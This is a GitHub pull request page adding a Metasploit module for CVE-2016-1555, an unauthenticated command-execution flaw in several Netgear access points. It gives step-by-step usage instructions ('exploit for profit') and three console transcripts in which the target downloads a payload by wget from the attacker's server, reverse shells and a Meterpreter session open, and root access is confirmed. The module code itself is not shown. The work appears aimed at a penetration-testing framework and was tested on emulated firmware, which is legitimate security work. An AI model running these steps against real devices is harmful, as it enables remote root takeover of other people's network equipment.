New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Module for CVE-2016-1555 vulnerability #10768

Open
wants to merge 12 commits into
base: master
from

Conversation

Projects
None yet
3 participants
@Psi0NYX

Psi0NYX commented Oct 8, 2018

Add a new module for the CVE-2016-1555 vulnerability that targets the following Netgear devices with these firmwares:

  • WN604 before 3.3.3
  • WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0

There are 5 possible vulnerable URIs (boardData102.php, boardData103.php, boardDataNA.php, boardDataJP.php and boardDataWW.php). boardDataWW.php will most likely be present in all vulnerable firmwares (WW for worldwide). The module "checks" for unauthenticated arbitrary command execution in the POST request sent to boardDataWW.php.

Tested on: Netgear WNAP320 firmware 2.0.3 and WN604 firmware 3.3.2, emulated with QEMU, setup by FIRMADYNE.

Verification

  • run msfconsole
  • use exploit/linux/http/netgear_unauth_exec,
  • set RHOST <target_ip>
  • set LHOST <your_ip>
  • set SRVHOST <your_ip> if you aren't hosting your payload on some other server
  • set TARGETURI boardData1xx.php or set TARGETURI boardDataXX.php if you want to pwn the other URIs. Default boardDataWW.php should work fine.
  • Default payload is linux/mipsbe/shell_reverse_tcp. Set to linux/mipsbe/meterpreter/reverse_tcp to get Meterpreter session.
  • exploit for profit.
  • No vulnerable URI means that it automatically fails, for both exploit and check:
    pull3
  • Basic documentation can be found at the documentation/modules/exploit/linux/http/netgear_unauth_exec.md file

Example Output with default payload (linux/mipsbe/shell_reverse_tcp)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/Ekvrz8LbW
[*] Client 192.168.200.100 (Wget) requested /Ekvrz8LbW
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56852) at 2018-10-09 20:24:56 +0630
[*] Command Stager progress - 118.97% done (138/116 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)

Example Output with meterpreter

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set PAYLOAD linux/mipsbe/meterpreter/reverse_tcp
PAYLOAD => linux/mipsbe/meterpreter/reverse_tcp
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/x6ZYzUoe9x7IR
[*] Client 192.168.200.100 (Wget) requested /x6ZYzUoe9x7IR
[*] Sending payload to 192.168.200.100 (Wget)
[*] Sending stage (1108408 bytes) to 192.168.200.100
[*] Meterpreter session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56854) at 2018-10-09 20:26:39 +0630
[*] Command Stager progress - 118.33% done (142/120 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : 192.168.200.100
OS           :  (Linux 2.6.32.70)
Architecture : mips
BuildTuple   : mips-linux-muslsf
Meterpreter  : mipsbe/linux
meterpreter > getuid 
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > 

Example Output using some other vulnerable URI (boardDataNA.php)

msf > use exploit/linux/http/netgear_unauth_exec 
msf exploit(linux/http/netgear_unauth_exec) > set RHOST 192.168.200.100
RHOST => 192.168.200.100
msf exploit(linux/http/netgear_unauth_exec) > set TARGETURI boardDataNA.php
TARGETURI => boardDataNA.php
msf exploit(linux/http/netgear_unauth_exec) > set LHOST 192.168.200.99
LHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > set SRVHOST 192.168.200.99
SRVHOST => 192.168.200.99
msf exploit(linux/http/netgear_unauth_exec) > exploit

[*] Started reverse TCP handler on 192.168.200.99:4444 
[*] Using URL: http://192.168.200.99:8080/zlJyAS8F1As
[*] Client 192.168.200.100 (Wget) requested /zlJyAS8F1As
[*] Sending payload to 192.168.200.100 (Wget)
[*] Command shell session 1 opened (192.168.200.99:4444 -> 192.168.200.100:56856) at 2018-10-09 20:28:41 +0630
[*] Command Stager progress - 118.64% done (140/118 bytes)
[*] Server stopped.

uname -a
Linux netgear123456 2.6.32.70 #1 Thu Feb 18 01:39:21 UTC 2016 mips unknown
id
uid=0(root) gid=0(root)

TODO LIST

  • Check for firmware version using a non-aggressive method. Firmware version can be found in getBoardConfig.php, which can (probably) be accessed without authorization. (EDIT: NB: requires hardware)
  • Stop the HTTP server after serving the payload! I think it doesn't stop properly after serving a payload or when a session is created. (EDIT: CmdStager makes this redundant)
  • When check is run explicitly, check for vulnerability in all the found URIs, not just the first one that's found. There are at least 2 vulnerable URIs, and one of them is most likely always boardDataWW.php. (EDIT: out of scope of the exploit module, would be a good idea for an auxiliary module though)
  • Test the module against the latest vulnerable firmware versions (WN604 firmware < 3.3.3 and WNAP320 firmware < 3.5.5.0). EDIT: Successful versus WN604 firmware 3.3.2, WNAP320 firmware 3.0.5.0 could not be emulated.
  • Update docs.

Psi0NYX added some commits Oct 8, 2018

Added module for CVE-2016-1555 (netgear_unauth_exec)
and its corresponding wordlist file (netgear_boardData_paths.txt).
Added documentation for
modules/exploit/linux/http/netgear_unauth_exec.rb
@bcoles

Is there a reason a custom HTTP stager is used, rather than the built-in curl/wget stargers?

Show resolved Hide resolved documentation/modules/exploit/linux/http/netgear_unauth_exec.md Outdated
Show resolved Hide resolved modules/exploits/linux/http/netgear_unauth_exec.rb Outdated
Show resolved Hide resolved modules/exploits/linux/http/netgear_unauth_exec.rb Outdated
Show resolved Hide resolved modules/exploits/linux/http/netgear_unauth_exec.rb Outdated
Show resolved Hide resolved modules/exploits/linux/http/netgear_unauth_exec.rb Outdated
Show resolved Hide resolved modules/exploits/linux/http/netgear_unauth_exec.rb Outdated
Show resolved Hide resolved modules/exploits/linux/http/netgear_unauth_exec.rb Outdated
Show resolved Hide resolved modules/exploits/linux/http/netgear_unauth_exec.rb Outdated
Show resolved Hide resolved modules/exploits/linux/http/netgear_unauth_exec.rb Outdated

Psi0NYX added some commits Oct 8, 2018

Fixed numbering in the documentation steps, offed some whitespace,
streamlined the send_request_cgi, removed the conn_check.

Psi0NYX added some commits Oct 8, 2018

Used a command stager, improved upon vulnerability detection and
generally attempted to streamline most of the code. Hardcoded one
vulnerable URI since it's the most likely to be present in all versions
of the vulnerable firmwares.

Psi0NYX added some commits Oct 9, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment